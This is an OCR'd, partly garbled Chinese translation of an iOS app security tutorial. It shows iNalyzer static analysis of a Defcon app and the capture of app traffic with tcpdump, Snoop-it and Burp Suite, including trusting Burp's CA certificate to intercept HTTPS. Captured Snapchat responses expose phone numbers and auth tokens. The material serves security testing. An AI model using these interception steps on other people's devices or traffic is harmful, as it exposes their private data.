9 2333 http://%@:%€@@%@/statuses/update. json 

10 2334 http://api-staging.khanfu.com/ 

11 2335 http://search.twitter.com/search. json 

12 2336 http://search.twitter.com/search.json?q=%é 
13 2337 http://www.group6.net 

14 2338 http://www.khanfu.com 

15 2339 https://www.apple.com/appleca/0 

16 2340 https://www.defcon.org/defconrss.xml 
\ndcode 


file:/ /localhost/Users/prateekgianchandani/Desktop/Dumped Apps/Defcon-v1.1/Payload/Doxygen /html /index.html 


你 也 可 以 看 看 应 用 中 使 用 的 所 有 的 view controller ° 


iNalyzer Dashboard APpPse 


Application security Capsi 


Defcon.app 











Main Page Related Pages Classes | Files | Qr Search 
Y Defcon.app DefconTableViewController 

> Strings analysis 

v ViewControllers DefconTableViewController click to load 


DefconinfoTableViewController 


Delccatulo Vei Coótroller EventDetailTableViewController 


FucniDetaliTableviewController EventDetailTableViewController click to load 


EventDetailViewController 


Events TableViewController EventDetailViewControl ler 


FavoriteTableViewController — " 
EventDetailViewController click to load 
FirstViewController 


HashDefconTableViewController EventsTableViewControl ler 


MapViewCortroller 


MocTableViewController EventsTableViewController click to load 
NowTableViewController 


PullToRefreshTableViewController FavoriteTableViewController 


SpeakerDetailTableViewController 
SpeakerDetailViewController FavoriteTableViewController click to load 
Speakers TableViewController 


TalkDetailTableViewController Fi rstViewControl ler 


TalksDetailViewController 
TalksTableViewController FirstViewController click to load 


UpdateTableViewController 


aeaoe HashDefconTableViewController 


dc17TableViewController p - 
HashDefconTableViewController click to load 


MapViewController 


MapViewController click to load 


MocTableViewController 


MocTableViewController click to load 


点 击 任 意 的 View controller， 你 可 以 看 到 它 的 方法 和 属性 。 


Info.Plist Content 
> Embeded Strings 
b Classes 
> Files 
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IOS Z-A Wi 
IOS 安全 Wi 


Ju V 


£^ 





KI 


Defcon.app 





iNalyzer Dashboard AppSec 


Application security 





Main Page | Related pages MTM Files | 


Class List Class Index | Class Hierarchy Class Members 
» CGSize 
> DCl7TableNavitem EventDetailViewController Class Reference 


» dcl7TableViewController 


> DefconAppAppDelegate 


: 2 awiene us 
> DefconAppDownload #import <EventDetailViewController.h 


> DefconAppLoadingView » Inheritance diagram for EventDetailViewController: 
DefconAppUtils p 1 P 

: » Collaboration diagram for EventDetailViewController: 
> DefconimageView 

» DefconinfoTableViewController 


Instance Methods 


> DefconinfoViewController 


» DefconLabel (id) - initWithEvent: 

» DefconTableViewController (void) - didReceiveMemoryWarning 
» DefconTextView (void) - dealloc 

» EGORefreshTableHeaderView (void) - viewDidLoad 

» Event (void) - viewDidUnload 

> EventDetailTableViewController (id) - event 


EventDetailViewController (void) - setEvent: 


> EventsTableViewController 


» EventTableViewCell Properties 
» FavoriteTableViewController 


* 
» FirstViewController Event event 


» HashDefconTableViewControlle 


> in_addr 

> MapViewController Detailed Description 

> MocTableViewController 

» NowTableViewController Definition at line 13 of file EventDetail ViewController.h. 


> NSObject(NSObject SBJSON) 

> <NSObject> 

> NSString(NSString_SBJSON) Method Documentation 
> Person 

» PersonType 


» PullToRefreshTableViewControl 7 (void) dealloc 





Qr Searct 


Instance Methods | Properties | List of all members 





你 也 可 以 看 看 Info.plist 文 件 的 内 容 。 


Defcon.app 


Main Page 





T Defcon.app 
+ Strings analysis 


E Viewtontrollers 


info.Plist Content { : 
CrRundleDevelopmentRegion 


Related Pages Classes | Files | 


Info.Plist Content 


to Jk 4p 35 4t Classes 
是 苹果 自己 的 类 ， 有 


* Embeded Strings CFBundleDisplayName 
* Classes CFBundleExecutable 
CFBundleIdentifier = "com.group6.defcon" 
* Files CFBundleInfoDictionaryVersion = "6.0" 
v File List CFBundleName 三 Defcon 


+ ReversingFiles 


CFBundlePackageType = APPL 
CFBundleResourceSpecification = "ResourceRules.plist" 


l CFBundleShortVersionString = "1.1" 
F File Members CFBundleSignature = "2222" 
All CFBundlesupportedPlatforms = ( 
iPhoneods 
Typedefs ) 
CFBundleversion = '1.1" 
DTCompiler = "4.2" 


^N 


1x 


xe 


— 


是 


x 


` 


也 


DTPlatformName = iphoneos 
DTPlatformVersion = "4.0 GM" 
DTSDKName = "iphoneos4.0" 
DTXcode = 0323 
LSRequiresIPhoneOS = 1 


MinimumOSVersion = "3.0" 
NSMainNibFile = MainWindow 
UIDeviceFamily = ( 

1 
) 


^-Tab > 4& Class Index 下 面 你 回 看 到 所 有 应 用 中 使 用 的 类 的 列表 。 有 些 
个 应 用 的 开发 者 创建 的 。 


iOS 4 Wiki 





Defcon. app iNalyzer Dashboard AppPse 


Application security [IE 三 全 


Main Page Related Pages Ea Files | Qr Search 


Class List Class Hierarchy | Class Members | 








v Defcon.app 
Class Index 


> Strings analysis 


> ViewControllers 


Info.Plist Content BICIDIEIFIHIIIMINIPIRISITIU 
Embeded Stri 
: Ed ida DefconinfoViewController TalksDetailViewController 
' ud DefconLabel w aw TalksTableViewController 
» Class List 


Bio DefconTableViewController in addr Reachability TwitterHelper 
ine: "o" DefconTextView CJ "ss TwitterMessage 
> Class Hierarchy 


» Class Members CGPoint uw MapViewController SBJSON as 

> Files CGRect EGORefreshTableHeaderView MocTableViewController SBJsonBase UlApplicationDelegate 

CGSize Event SBJsonParser Ullmage(INResizelmageAllocator) 
EventDetailTableViewController us SBJsonParser UlScrollViewDelegate 

us EventDetailViewController NowTableViewController SBJsonWriter UlTabBarControllerDelegate 
DC17TableNavitem EventsTableViewController NSObject(NSObject_SBJSON) SBJsonWriter UIWebViewDelegate 
dci7TableViewController EventTableViewCell NSObject sockaddr_in UpdatesUIViewController 
DefconAppAppDelegate NSString(NSString SBJSON) SpeakerDetailTableViewController ^ UpdateTableViewController 
DefconAppDownload F| SpeakerDetailViewController 
DefconAppLoadingView FavoriteTableViewController "P SpeakersTableViewController 
DefconAppUtils FirstViewController Person —. 
DefconlmageView PersonType 
DefconinfoTableViewController aw PullToRefreshTableViewController —TalkDetailTableViewController 


HashDefconTableViewController 
BICIDIEIFIHIIIMINIPIRISITIU 


如 果 你 到 Class Hierarchy Tab (类 层次 标签 ) 下 ， 你 可 以 看 到 以 图 像 方式 展示 的 类 信息 和 它 
们 之 间 的 关系 。 这 会 给 你 大 量 关 于 应 用 如 何 工 作 的 知识 。 这 些 图 使 用 Graphviz 这 个 工具 产生 
的 。 





iNalyzer Dashboard Appse 


Application security MEES 


Files | Q Search 


Defcon.app 


Main Page | Related Pages 










Class List | Class Index Class Members | 


v Defcon.app 


> Strings analysis Ullmage View DetconImageView 
> ViewControllers 
DefconinfoTable View Controller 






Info.Plist Content 








> Embeded Strings 






FavoriteTable ViewContoler 


















Y Classes EventDetailTable ViewContoler dc17Table ViewContoler 
Class Li 
ens NowTable ViewContoller 
Class Index 
MocTable ViewController DefoonTable Vie wController EventsTable Vie wController 
» Class Members UlTableViewContoller PullToRefresnT able ViewContoller 






» Files SpeakerDetailTable Vie wController 


TalkDetalTable View Controller 


HashDetconTable Vie wContoler TalksTable ViewContoler 





SpeakersTableViewContoller 





UpdateT able ViewContolier 
DC17TableNavitem 










DefconAppAppDelegate 


如 果 你 选择 文件 标签 (files tab), 你 可 以 看 到 iNalyer 生 成 的 所 有 接口 文件 。 


€ 


WS 


本 文 我 们 学 习 了 如 何 使 用 iNalyer 对 iOS 应 用 程序 进行 静态 分 析 ， 可 以 看 到 它 使 我 们 的 工作 变 得 
非常 容易 。 


本 文 原文 是 IOS Application Security Part 15 — Static Analysis of IOS Applications using 
iNalyzer 
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iOS 安全 Wiki 


#5 iOS 应 用 静态 分 析 下 的 更 多 文章 
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本 章 介 绍 了 对 iOS 应 用 进行 静态 分 析 的 各 个 方面 ， 包 括 本 地 文件 系统 取证 、 本 地 数据 存储 及 安 
全 性 、Keychain 并 不 安全 ， 可 以 导出 数据 、 以 及 使 用 iNalyzer 进 行 静 态 分 析 的 方法 。 


下 一 草 ， 我 们 将 要 介绍 如 何 对 iOS 应 用 进行 动态 分 析 。 


#5 iOS 应 用 静态 分 析 下 的 更 多 文章 


IOS 应 用 动态 分 析 


本 文 我 们 将 看 看 如 何 分 析 iOS 设 备 上 的 网 络 流 量 。 分 析 应 用 的 网 络 流 量 会 带 来 几 个 方面 的 好 
处 。 它 可 以 帮助 我 们 推断 应 用 是 如 何 管理 用 户 会 话 的 ， 我 们 应 用 调用 的 另 一 方 是 谁 ， 以 及 应 
用 程序 内 部 是 如 何 工 作 的 等 等 。 我 们 也 会 看 看 如 何 分 析 使 用 SSL 的 网 络 流量 。 


监听 网 络 流量 有 主动 和 被 动 两 种 方式 。 如 果 你 对 远程 分 析 一 个 网 络 中 的 特定 设备 的 流量 感 兴 
趣 ， 那 你 需要 Wireshark 这 个 工具 。 打 开 Wireshark, 开 始 嗅 探 网 络 ， 添 加 一 个 过 滤器 (fliter > 
例如 ip.addr == 192.168.1.2) 以 便 它 只 显示 你 的 设备 发 出 或 者 接收 的 网 络 流量 。 如 果 你 的 无 
线 网 卡 不 够 好 ， 那 么 有 些 数 据 包 可 能 会 丢失 。 


如 果 你 想 要 分 析 使 用 SSL 的 设备 的 网 络 流 量 ， 有 许多 方法 可 以 达到 目的 ， 比 如 使 用 
Arpspoof(ARP 噢 探 ) 和 SSLStrip 的 组 合 。 不 过 ， 因 为 我 们 只 对 分 析 某 个 特定 应 用 的 网 络 流量 
感 兴趣 ， 我 们 将 使 用 另 一 个 不 同 的 方法 。 先 申明 下 ， 本 文 关 注 的 是 分 析 网 络 流量 而 不 是 劫持 
网 络 流 量 。 并 且 ， 我 们 既 能 够 分 析 通 过 Wi-Fi 的 流量 ， 也 能 分 析 通 过 蜂 帘 网 络 (cellulan) 的 流 

量 。 因 为 我 们 只 是 对 分 析 茶 个 特定 应 用 的 网 络 流量 不 兴趣 ， 那 选择 哪 种 媒介 (medium， 这 里 
指 Wifi 或 者 celluar) 事 实 上 并 不 重要 。 


使 用 TCPDump 


抓 取 设 备 上 的 网 络 流量 的 一 个 最 基本 技巧 是 使 用 tcpdump。 首先 ， 请 确保 你 的 设备 上 安装 了 
tcpdump ° 


Prateeks-MacBook-Pro:- prateekgianchandani$ ssh root@18@.6.1.79 

roota18.8.1.79's password: 

Prateeks-iPod:- root# apt-get install tcpdump 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

tcpdump is already the newest version. 

The following packages were automatically installed and are no longer required: 
com.saurik.iphone.ske libagpg-error class-dump-z preferenceloader libstatusbar applist python gcrypt veency libvncserver 
ch.ringwald.hidsupport ldone jpeg jp.ashikase.mousesupport 

Use 'apt-get autoremove' to remove them. 

8 upgraded, B newly installed, B to remove and 5 not upgraded. 

Prateeks-iPod:- root£ ff 


现在 ， 开 始 在 茶 个 特定 的 接口 上 抓 取 数据 并 且 输 出 到 一 个 文件 。 


Prateeks-iPod:- root# tcpdump -i enB -w /tmp/capture.pcap 

tcpdump: listening on enB, link-type EN18MB (Ethernet), capture size 68 bytes 
^C125805 packets captured 

12614 packets received by filter 

8 packets dropped by kernel 

Prateeks-iPod:- root# B 


为 了 在 使 用 蜂窝 数据 的 时 候 抓 取 数据 ， 仅 仅 需 要 把 上 述 命令 中 的 接口 换 成 你 的 蜂窝 链接 对 应 
的 |P 地 址 即 可 。 


为 了 分 析 这 个 文件 ( 抓 包 保存 的 文件 ) ， 你 可 以 把 它 传 输 到 你 的 电脑 上 ， 然 后 用 Wireshark 分 
Peo Rit > Eto th TIERS AVIRA + NARA IRA > Pipes 可 以 更 好 的 完成 这 个 
过 程 。 更 多 的 信息 请 看 过。 用 tcpdump 给 了 我 们 太 多 底层 的 信息 ， 很 多 信息 对 我 们 从 分 析 应 用 


的 数据 的 角度 来 说 并 不 感 兴 趣 。 更 好 的 方法 是 使 用 Burpsuite 和 Snoop-it 。 


使 用 Snoop-it 


no it 来 分 析 网 络 流量 。 顺 便 说 一 下 ， 如 果 你 还 不 知道 Snoop-it 是 哈 ， 
查看 这 里 。 为 了 查看 调用 的 api 和 网 络 请 求 ， 打 开 在 Snoop-it 的 任意 应 用 然后 查看 最 左边 的 
络 部 分 。 例 如 ， 下 图 展示 了 Snapchat 应 用 的 网 络 调用 情况 。 








k ” Snoop-it Snapchat gy Connection Status: @ 
=) Monitoring Home Network 
|] Filesystem Network Access (HTTP requests using NSURLConnection) 
|] Keychain wv Network Summary 
[3] Network Display MIME Types: Display http/https: 
| à Sensitive API Text: |V Images: |V Others: |V Http: (V Https : |V 
& (J Analysis ID Timestamp Protocol URL Query String 
[3] Objective-C Classes 1 21.07.13 02:44:20 http:// data.flurry.com /aas.do 所 
[E] View Controller 2 21.07.1302:44:20 http:// data.flurry.com laas.do 
国 URL Schemes 3 21.07.13 02:44:20 http; data.flurry.com laas.do 
日 器 Runtime Manipulation 4 21.07.13 02:45:45 https:// feelinsonice-hrd.appspot.com Ibg/login 
[3] Hardware Identifier 5 21.07.13 02:57:48 http:// data .flurry.com laas.do 
国 Fake Location 6 21.07.13 02:57:48 http:// data.flurry.com laas.do 
国 Method Tracing 7 21.07.13 02:57:49 http; data.flurry.com laas.do 
11 21.07.13 02:59:10 http:// data.flurry.com laas.do 
13 21.07.13 02:59:41 https:// feelinsonice-hrd.appspot.com !bg/login 
15 21.07.13 02:59:46 https :// feelinsonice-hrd.appspot.com !bg/blob 
16 21.07.13 02:59:46 https:// feelinsonice-hrd.appspot.com Ibg/blob 
19 21.07.13 03:03:21 https:// feelinsonice-hrd.appspot.com /bq/upload 
21 21.07.13 03:03:41 https:// feelinsonice-hrd.appspot.com Ibg/send 
23 21.07.13 03:03:44 https :// feelinsonice-hrd.appspot.com /bq/updates 
25 21.07.13 03:03:46 https:// feelinsonice-hrd.appspot.com Ibq/blob 
27 21.07.13 03:04:24 https:// feelinsonice-hrd.appspot.com Ibg/clear 
29 21.07.13 03:04:50 https:// feelinsonice-hrd.appspot.com Ibg/upload 
31 21.07.13 03:05:22 https:// feelinsonice-hrd.appspot.com Ibg/upload 
33 21.07.13 03:08:28 https:// feelinsonice-hrd.appspot.com !bg/upload 
35 21.07.13 03:09:28 https:// feelinsonice-hrd.appspot.com Ibg/send 
37 21.07.13 03:09:31 https:// feelinsonice-hrd.appspot.com Ibg/updates * 
^ Details 





如 果 我 们 点 击 某 个 特殊 请 求 ， 我 们 能 够 看 到 请 求 串 的 内 容 ， 比 如 body 等 等 。 


13 21.07.13 02:59:41 https :// feelinsonice-hrd.appspot.com /ba/login 
15 21071302:59:46 httns // feelinsonic.e-hrd anpspot com !bn/blob x 
v Details 


wouy: | 


Timestamp: | 21.07.13 02:59:46 
Type: Response 
Protocol: | https:// 
Url: | feelinsonice-hrd.appspot.com 
Query String: | /ba/login 


("added friends timestamp":0,"bests":[],"snapchat phone number*:**13107517549","tentative mobile"*:**918755867537","image caption":false,"auth ' ryt *71484141-05bc-4faf-bf12-d79c29e8557d","received":1,"logged":true,"z _ 
(name*:"gofffggf”,“display”:™,“type":0}],“snaps™:[{"id":"7164813743401991211-,“sn”:"gofffggt”, "t':3, "ts": 1374340199121 ,"sts":13743401991 21 ,"m":0,"st":1} (7 id":"716481374340199121s" "rp": "gofffggf,“ts":1374340199121 ,“sts":137 = 
Body: {"id":"999168374339639260s","rp":"gafffggf “ts”: 1374339755000, "sts": 1374339639260,"c_id™:"GGFFFGGF1374339628GGFFFGGF","m":0,"st":2},{ 5-2400763740100652217", "sn*: "gafffggf", "ts":1374010065221,*sts":13740100 
* | (7id":7984394374008945807r" "sn": gafffggf" "t":10,7ts":1374008945807 "sts":1374008945807,"m":0,"st":1}, "id": "984394374008945807s" "rp": "gafffggf", *ts*:1374008945807,"sts*:1374008945807,"c. id" GGFFFGGF1374008929G 
("id":7946481374006507110s","rp":;"ggfffggf" ,"ts":1374011259000,sts":13740086507110,"c. id" GGFFFGGF1374006498GGFFFGGF","m":0,"st":2)]," device token";"53FCC1ESABECBDCA37169297E92CEOE01ADE7AEDBDSB&( 

[] 


1% f] Burpsuite 24 7; HTTP 


再 说 一 下 ， 有 许多 方法 能 够 查看 网 络 的 请 求 / 相 应 ， 这 其 中 Burpsuite 是 一 个 非常 棒 工 具 。 可 以 

它 的 官方 网 站 下 载 。 下 载 它 的 免费 版 本 就 足够 元 成 我 们 本 文 的 任务 了 。 predi ， 如 采 
你 从 来 没有 用 过 Burpsuite， 请 查看 关于 Burpsuite 的 另 一 篇 文章 。 这 里 最 主要 的 任务 就 是 把 
Burpsuite 当 作 一 个 代理 ， 然 后 路 由 所 有 经 过 它 的 网 络 流量 。 


打开 Burpsuite, 到 Proxy， 和 选择 Options 


iOS 4 Wiki 





(2) Proxy Listeners 


* 


Im Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use o 


| ir | 


| Edt | 
| Remove | 





点 击 已 经 设置 的 代理 ， 点 击 编辑 (edit) ， 然 后 选择 在 Bind to Addrees 这 个 选项 的 All 
Interfaces 这 个 选项 。 





Burp Intruder Repeater Window Help 


(Target | Proxy | spider [ scanner J mruder | Repeater | Sequencer [ Decoder | Comparer | options | Alerts | 


Burp Suite Free Edition v1.5 | 











(2) Proxy Listeners 


T Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as its proxy server. 





Add Running | Interface | Invisible | Redirect | Certificate | 


""———————À-£24. ——————— 


(2) These settings control how Burp binds the proxy listener. 


Bind to port: 8080 


Bind to address: Q) Loopback only 
© All interfaces 


| Remove | | 












Intercept 


Use these settings O Specific address: | 127.0.0.1 vj 





G & 

















| OK | Cancel | | 


国 Automatically up 














(2) Intercept Server Responses 
(o) Use these settings to control which responses are stalled for viewing and editing in the Intercept tab. 
C) Intercept responses based on the following rules: 
| Add | Enabled | Operator | Match type | Relationship | Condition 
SS 四 Content type Matches text 
Edit o Or Request Was modified 
| —, =. anos | PY a VT NP Ppp am dm nd. bi 











现在 我 们 能 够 编辑 代理 监听 的 端口 ， 其 至 增加 一 个 新 的 监听 代理 。Burp 有 个 选项 ， 能 够 把 证 
书 传递 给 使 用 SSL 的 网 站 。 在 安装 的 时 候 ，Burp 就 默认 的 创建 了 一 个 自 签名 的 CA 证 书 。 现在 
选中 的 选项 (如 下 图 ) > “generate CA-signed per-host certificates” 就 会 用 安装 Burp 的 时 候 
创建 的 CA 证 书 给 我 们 正在 连接 的 host 生 成 一 个 证 书 。 
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Edit proxy listener 


Requesthandling | Certificate 








[?| These settings control the server 55L certificate that is presented to 55L clients. 
O Use a self-signed certificate 
(9 Generate CA-signed per-host certificates 


O Generate a CA-signed certificate with a specific hostname: 

















O Use a custom certificate (PKCS12): 
Fili 


| 


Fus: 


| OK || Cancel | 





你 会 被 提示 一 个 敬告。 点 击 YES。 我 们 选择 绑 定 到 所 有 接口 的 原因 就 是 我 们 硕 望 我 们 的 
iPhone 能 够 用 我 们 的 电脑 作为 代理 ， 因 此 选择 绑 定 到 本 地 接口 是 不 够 的 。 


eoo Confirm 


Are you sure you want to listen on all interfaces? 


A This will enable other network users to use the proxy and view the proxy history. 
e 


现在 ， 到 Proxy 一 Intercept， 然 后 确保 Intercept 设 置 成 了 off。 这 是 因为 你 可 
这 个 代理 的 数据 包 打 扰 。 











Intercept | History | Options 


| Interceptis off | 


> 


现在 ， 你 可 以 让 你 的 设备 把 所 有 网 络 流量 通过 你 的 代理 。 在 你 的 iDS 设 备 上 ， 到 设置 


(Settinigs) app， 选 择 Wifi， 选 择 你 目前 正在 连接 的 网 络 的 设置 ， 滚 动 到 下 面 ， 那 里 会 有 一 


个 选项 来 设置 代理 。 把 代理 地 址 设置 成 正在 运行 Burpsuite 的 电脑 的 |P 地 址 ， 端 口 设 置 为 代理 
运行 的 端口 。 


iOS 4 Wiki 


Manual 


10.0.1.35 


8080 


Authentication (^Y orF^ 


Manage this Network 





现在 代理 已 经 建立 起 来 了 ， 我 们 已 经 配置 好 我 们 的 设备 来 使 用 这 个 代理 ， 打 开 任 意 一 个 不 是 
用 SSL 的 应 用 (我 们 将 会 在 本 文 的 后 面 一 点 讨论 SSL) ， 然 后 随便 用 用 让 应 用 发 出 些 网 络 请 
求 。 你 可 以 在 Burpsuite 看 到 这 些 请 求 。 下 面 就 是 NASA TV app 的 网 络 流量 。 


eoo Burp Suite Free Edition v1.5 
Burp Intruder Repeater Window Help 














| Intercept | History | Options | 
Filter: Hiding CSS, image and general binary content 2j 
| 








# ui Host | Method | URL | Params | Modified | Status | Length | MIME type | Extension | Title | 
1 http:/ /www.nasa.gov GET [rss/recent videos.xml GJ GJ 200 13191 XML xml | 


7 http:/ /cdn-akm.vmixcore.com GET /vmixcore/p 


layuvp?token=VO5nC... w) tJ 200 1912 XML 








[aÑ 7 ur 
| Request | Response | 
Raw Headers Hex 


GET /vmixcore/playuvp?token-Vü0ISogsp0bolTkbwyEZJylEOYO02Pn9IvOW&output-xml HTTP/1.1 a 
Host: cdn-akm.vmixcore.com 

User-Agent: NASA*20TV/1.1 CFNetwork/548.1.4 Darwin/11.0.0 

Accept: */* 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Pragma: no-cache 

Connection: keep-alive 

Proxy-Connection: keep-alive 


使 用 Burpsuite 的 好 处 就 是 我 们 能 以 原生 的 格式 (raw) 和 十 六 进 制 (hex) 的 格式 查看 数据 
包 ， 我 们 也 可 以 查看 参数 (Params) feX: (Headers) 
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| Request | Response | 


Raw Params Headers Hex 


GET request to /vmixcore/playuvp 


Type | Name | Value 
URL token VOl8ogspObO1TbwyEZ}y LEOYOO2Pn9lv 
URL output xml 


而 有 全， 我 们 也 能 够 看 到 东 个 特定 请 求 的 对 应 返回 包 


| Request | Response | 


Raw | Headers | Hex | XML | 


HTTP/1.1 200 OK a 
Server: Apache 

Content-Length: 1844 

Content-Type: text/xml 

Date: Tus, 23 Jul.2013 11:52:42 GMT 

Connection: close 





<?xml version="1.0" encoding="IS0-8859-1" ?> 
<data> 
«file»«! [CDATA[http://cdn-akm. vmixcore .com/ vmixcore/d1/ZX1KdFpXxUnBZVj lwikNJNk 1qRTJOVEE yT1LRBd01TSXNJIbUS zWVhO0e lg ybGt Jam9pT 
VHNJcOltWinZjbTFoZEHJHkltHMXdOQ0lzSW1ladmWHtHHhkR]j lwwkNJINkSqVINMO OpSWVhKMGJt Vn 1 ¥Mmxr Sp vaUSESXpJaxdp¥ldWa2FXRmZiM2R1iWLhJavgsps 
TBHak1pTEHKd2JHRjVYMnh2WjE5cFpDSTZiblZz YkN3aWRHOXJaVzRpT25zaWJXVmthVO0VpT2pFHk5UOTJOVEF 3TVN3aWJXVmth V0 ZmYy jNkdVpYSWlPalF5T 
Xl3aWHHRnlkRzVsY2w5cFpDSTZOREl6TENKbWIzSnRZWFFpT2pZHU55d21jHMjkxY210bFg ybGtJam94TWpFHGZTd21kSE1pT2pFek56UXh PVFUOTVRrcOluT 
jPZWEowSWHpveExDSmtaV3hwZzGliWeWVWOWpiHjVtYVdkZmFXUWlPaUl4TmpFaUxDSmlhV3hsYzJWMElqcHVkV3hzZlE9PWEyNjOyNWQOzODc5O0TYxNz AwHDBk7 
GZim¥mRkZjUOMT1Lk/ file .mp4]]></ file> 

«adUrl /> 


<logURL><! [CDATA [http :// logs .vmixcore .com/ vmixcore /playlog?token-ZXlKdFpXUnPBZVjlwWkHJHklqRTJOVEEyTlRBdO01TSXNHJbUS5zWVhOe lg 
ybGt Jam9pTVNJc 01 thn Z jbTFoZENINkK LtMxd00012SWliadmNtMWhkRj lwikNJINk5qVINMO Op 3SWVhKMGJt Vu 1 ¥Mmxr SWp vaU5SESXpJaxdp¥1dWa2FxXRmZiM2R 


这 给 了 我 们 详尽 的 细节 来 了 解 一 个 应 用 是 如 何 与 后 台 通 信 的 ， 我 们 在 调用 谁 ， 以 及 请 求 的 格 
式 是 什么 样 的 。 


使 用 Burpsuite 监 听 HTTPS 


不 过 ， 上 述 的 技巧 对 于 那些 使 用 HTTPS 和 与 后 台 通信 的 应 用 是 不 起 作用 的 。 有 些 应 用 只 调用 
SSL 连 接 。 例 如 ， 如 果 你 试图 通过 这 个 代理 运行 Snapchat 就 不 会 成 功 。 不 过 ， 有 些 应 用 会 跳 
出 一 个 警告 ， 然 后 让 你 确认 或 者 取消 这 个 连接 。 例 如 ， 如 下 图 所 示 就 是 当 通 过 代理 运行 Safari 
的 时 候 的 情况 。 


Cannot Verify Server Identity 


Safari cannot verify the identity of 
“accounts.google.com”. Would you 
like to continue anyway? 


Cancel 


ee 
Details 


Continue 





如 果 你 点 击 继续 ， 那 么 你 就 能 够 看 到 应 用 的 网 络 流量 。 请 注意 ， 这 个 警告 仅仅 针对 目前 的 
host， 如 果 你 浏览 到 另 一 个 使 用 HTTPS 的 网 站 ， 那 另 一 个 警告 又 会 弹出 来 ， 因 为 Burpsuite 为 
每 个 host 生 成 一 个 假 的 SSL 证 书 。 


Burp Intruder Repeater Window Help 
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Decoder | Comparer ' Options - Alerts 


| Intercept | History | Options | 


| Target Proxy Spider | Scanner Intruder Repeater ' Sequencer 


Filter: Hiding CSS, image and general binary content (2) 


























€ | Host Method | URL | Params | Modified | Status Length | MIME type | Extension | Title 
1 http:/ /www.nasa.gov GET /rss/recent_videos.xml - m 200 13191 XML xml 
7 http:/ /cdn-akm.vmixcore.com GET /vmixcore/playuvp?token=VO5nC... 四 GJ 200 1912 XML 
9 http:/ /cdn-akm.vmixcore.com GET /vmixcore/playuvp?token=VOI80g... 加 LJ 200 1981 XML 
11 http:/ /data.flurry.com POST faas.do 四 GJ 200 149 do 
12 https://accounts.google.com GET /ServiceLoginAuth (eo) fs») 200 70293 HTML Google Accounts 
13 https://accounts.youtube.com GET /accounts / CheckConnection?pmp... 加 GJ 200 3011 HTML 

(M https://accounts.google.com POST ' i | @ e 302 2873 HTML Mo\ | 
15 https://accounts.google.com GET / CheckCookie?chtml- LoginDoneH... (7j 加 302 1861 HTML Moved Temporarily 
16 https://accounts.google.com GET [/b/O/VerifiedPhonelnterstitial?cont... (ZJ 加 200 215455 HTML Google Accounts 
17 https://accounts.google.com GET {b/0/VerifiedPhonelnterstitial?cont... (7j CJ 200 215455 HTML Google Accounts 


4X 7 T> 
| Request | Response | 





| Raw Params ' Headers | Hex 


POST renuest to /Servicel nainAuth 


每 当 我 们 通过 Burpsuite 连 接 一 个 HTTPS 网 站 的 时 候 ，Burp 会 为 每 一 个 host 生 成 SSL 证 书 ， 这 
个 证 书 是 用 我 们 自己 的 CA (Certificate Authority) 证 书签 名 的 。 为 了 确保 不 让 这 些 警 告 每 次 
都 跳出 ， 我 们 要 在 设备 上 把 这 个 Burp 的 CA 证 书 设 置 为 受信 任 的 根 证 书 。 因 此， 需要 采取 下 述 
步骤 。 首 先是 得 到 这 个 根 证 书 ， 然 后 把 它 安装 到 设备 上 。 一 旦 它 安 装 到 设备 上 ， 它 就 是 一 个 


受信 任 的 根 证 书 它 可 以 签名 所 有 的 和 证书， 并且 它 签名 的 所 有 证 书 都 是 合法 的 。 请 注意 这 个 十 
书 的 私 钥 (private key) 保 存在 你 的 电脑 上 ， 因 此 当 网 络 流量 通过 你 电脑 上 的 代理 的 时 候 ，Burp 
就 能 够 用 这 个 私 钥 解 露 这些 数据 。 这 个 根 证 书 在 你 把 Burp 安 装 到 系统 的 时 候 就 已 经 被 创建 好 
Ta 


为 了 把 这 个 根 证 书 安装 到 你 的 系统 上 ， 首 先 配 置 你 的 浏览 器 使 用 Burpsuite 代理 。 
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Advanced 
Configure Proxies to Access the Internet 
Ce ( JNo proxy 
Cc ( ) Auto-detect proxy settings for this network 3 
+ Use system proxy settings | 
Ce (*) Manual proxy configuration: | 
J HTTP Proxy: 127.0.0.1 | Port: | soso) | 


[1 [VÍ Use this proxy server for all protocols 


SSL Proxy: 127.0.0.1 Port: 8080 |. 
FTP Proxy: 127.0.0.1 Port: 8080 |. 
Ol 
| SOCKS Host: 127.0.0.1 Port: 8080 |. 
Y SOCKS v4 (*) SOCKS v5 J a 
E No Proxy for: D 
T localhost, Js 0.0.1 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
( JAutomatic proxy configuration URL: 
Reload 
? PT nS 
we eh | Cancel | | OK | 


然后 浏览 使 用 SSL 的 网 站 ， 你 会 看 到 如 下 的 一 个 警告 


This Connection is Untrusted 


You have asked Firefox to connect securely to accounts.google.com, but we can't confirm 
that your connection is secure. 





Normally, when you try to connect securely, sites will present trusted identification to prove 
that you are going to the right place. However, this site's identity can't be verified. 


What Should | Do? 


If you usually connect to this site without problems, this error could mean that someone is 
trying to impersonate the site, and you shouldn't continue. 


Get me out of here! 


» Technical Details 


现在 我 们 的 任务 就 是 导出 这 个 用 来 签名 所 有 这 些 证 书 的 根 证 书 。 对 于 gmail.com 域 名 ， 我 们 不 
可 能 导出 这 个 根 证 书 ， 因 为 我 们 不 能 对 gmail 的 域名 添加 例外 。 每 个 域名 都 可 以 实施 这 样 的 措 
施 。 不 过 ，facebook 允 许 我 们 添加 一 个 例外 。 用 Firefox 访 问 facebook.com。 你 会 看 到 一 个 警 
告 ， 点 击 “ 了 解 这 个 风险 ”( Understanding the Risks) 然后 点 击 添加 例外 (Add an 
Exception ) 


p 
; 





This Connection is Untrusted 


You have asked Firefox to connect securely to www.facebook.com, but we can't confirm 
that your connection is secure. 


Normally, when you try to connect securely, sites will present trusted identification to prove 
that you are going to the right place. However, this site's identity can't be verified. 


What Should | Do? 


If you usually connect to this site without problems, this error could mean that someone is 
trying to impersonate the site, and you shouldn't continue. 


Get me out of here! 


* Technical Details 
www.facebook.com uses an invalid security certificate. 
The certificate is not trusted because the issuer certificate is not trusted. 
(Error code: sec error untrusted issuer) 

* | Understand the Risks 
If you understand what's going on, you can tell Firefox to start trusting this site's 
identification. Even if you trust the site, this error could mean that someone is 
tampering with your connection. 


Don't add an exception unless you know there's a good reason why this site doesnt use 
trusted identification. 


Add Exception... 





Server 


a LL A7. LL 


You are about to override how Firefox identifies this site. | 
